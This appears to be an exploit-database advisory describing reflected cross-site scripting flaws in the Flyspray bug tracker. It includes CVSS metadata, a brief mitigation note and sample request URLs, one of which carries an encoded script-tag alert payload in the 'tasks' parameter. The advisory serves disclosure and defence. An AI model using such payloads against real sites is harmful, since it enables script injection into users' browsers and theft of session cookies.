Cross-Site Scripting Vulnerabilities in Flyspray

vendor:

Flyspray

by:

Unknown

5.5

CVSS

MEDIUM

Cross-Site Scripting (XSS)

CWE

Product Name: Flyspray

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:flyspray_project:flyspray

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Cross-Site Scripting Vulnerabilities in Flyspray

Flyspray is prone to multiple cross-site scripting vulnerabilities. These vulnerabilities occur due to a lack of proper sanitization of user-supplied input. An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user, potentially leading to the theft of authentication credentials and other attacks.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input sanitization and validation mechanisms to prevent the execution of arbitrary script code.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15209/info

Flyspray is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 

http://www.example.com/index.php?PHPSESSID=270ca5a0f7c1e5b2fd4c
52b34cdfe546&tasks=&project=1&string=lala&type=&sev=&due=
&dev=&cat=&status=&perpage=20

http://www.example.com/index.php?tasks=all%22%3E%3Cscript
%3Ealert%28%29%3C%2Fscript%3E&project=0

http://www.example.com/index.php?order=sev&project=1&tasks=&type=
&sev=&dev=&cat=&status=&due=&string=&perpage=20&pagenum=0&
sort=desc&order2=&sort2=desc